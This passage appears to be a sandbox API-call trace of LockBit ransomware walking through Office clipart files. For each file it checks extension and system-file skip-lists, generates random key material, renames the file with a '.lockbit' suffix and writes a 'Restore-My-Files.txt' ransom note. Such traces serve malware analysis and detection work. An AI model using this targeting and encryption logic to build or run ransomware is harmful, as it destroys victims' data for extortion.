hTemplateFile=0x0) returned 0xffffffff [0115.781] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf02ca800, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf02ca800, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x79cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01659_.WMF", cAlternateFileName="")) returned 1 [0115.781] lstrcmpiW (lpString1=".", lpString2="FD01659_.WMF") returned -1 [0115.781] lstrcmpiW (lpString1="..", lpString2="FD01659_.WMF") returned -1 [0115.781] PathFindExtensionW (pszPath="FD01659_.WMF") returned=".WMF" [0115.781] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.781] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.782] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.782] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01659_.WMF") returned 1 [0115.783] lstrcmpiW (lpString1="ntldr", lpString2="FD01659_.WMF") returned 1 [0115.783] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01659_.WMF") returned 1 [0115.783] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01659_.WMF") returned -1 [0115.783] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01659_.WMF") returned -1 [0115.783] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01659_.WMF") returned 1 [0115.783] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01659_.WMF") returned 1 [0115.783] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.783] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF") returned=".WMF" [0115.783] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.783] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.783] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.784] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.784] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.lockbit") returned 72 [0115.784] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0115.792] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.792] malloc (_Size=0x40068) returned 0x1ff1e60 [0115.792] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31180) returned 1 [0115.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0115.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0115.793] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0115.796] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.796] malloc (_Size=0xa6) returned 0x77d7a8 [0115.796] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.797] free (_Block=0x77d7a8) [0115.797] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01659_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.797] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.797] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd62f9d00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd62f9d00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x329e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD01660_.WMF", cAlternateFileName="")) returned 1 [0115.797] lstrcmpiW (lpString1=".", lpString2="FD01660_.WMF") returned -1 [0115.797] lstrcmpiW (lpString1="..", lpString2="FD01660_.WMF") returned -1 [0115.797] PathFindExtensionW (pszPath="FD01660_.WMF") returned=".WMF" [0115.797] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.797] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.797] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.797] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.797] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.797] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.798] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.799] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.799] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD01660_.WMF") returned 1 [0115.799] lstrcmpiW (lpString1="ntldr", lpString2="FD01660_.WMF") returned 1 [0115.800] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD01660_.WMF") returned 1 [0115.800] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD01660_.WMF") returned -1 [0115.800] lstrcmpiW (lpString1="autorun.inf", lpString2="FD01660_.WMF") returned -1 [0115.800] lstrcmpiW (lpString1="thumbs.db", lpString2="FD01660_.WMF") returned 1 [0115.800] lstrcmpiW (lpString1="iconcache.db", lpString2="FD01660_.WMF") returned 1 [0115.800] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.800] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned=".WMF" [0115.800] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.800] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.800] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0115.801] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0115.801] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.lockbit") returned 72 [0115.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0115.802] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0115.802] malloc (_Size=0x40068) returned 0x3e70008 [0115.802] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=12958) returned 1 [0115.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0115.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0115.803] ReadFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0115.811] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.811] malloc (_Size=0xa6) returned 0x77d7a8 [0115.811] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0115.812] free (_Block=0x77d7a8) [0115.812] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0115.812] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0115.812] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0115.812] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD02068_.WMF", cAlternateFileName="")) returned 1 [0115.812] lstrcmpiW (lpString1=".", lpString2="FD02068_.WMF") returned -1 [0115.812] lstrcmpiW (lpString1="..", lpString2="FD02068_.WMF") returned -1 [0115.812] PathFindExtensionW (pszPath="FD02068_.WMF") returned=".WMF" [0115.812] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0115.812] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0115.813] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0115.814] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0115.814] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD02068_.WMF") returned 1 [0115.815] lstrcmpiW (lpString1="ntldr", lpString2="FD02068_.WMF") returned 1 [0115.815] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD02068_.WMF") returned 1 [0115.815] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD02068_.WMF") returned -1 [0115.815] lstrcmpiW (lpString1="autorun.inf", lpString2="FD02068_.WMF") returned -1 [0115.815] lstrcmpiW (lpString1="thumbs.db", lpString2="FD02068_.WMF") returned 1 [0115.815] lstrcmpiW (lpString1="iconcache.db", lpString2="FD02068_.WMF") returned 1 [0115.815] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0115.815] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned=".WMF" [0115.815] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0115.815] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0115.815] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0115.816] lstrcmpiW (lpString1=".mwb", 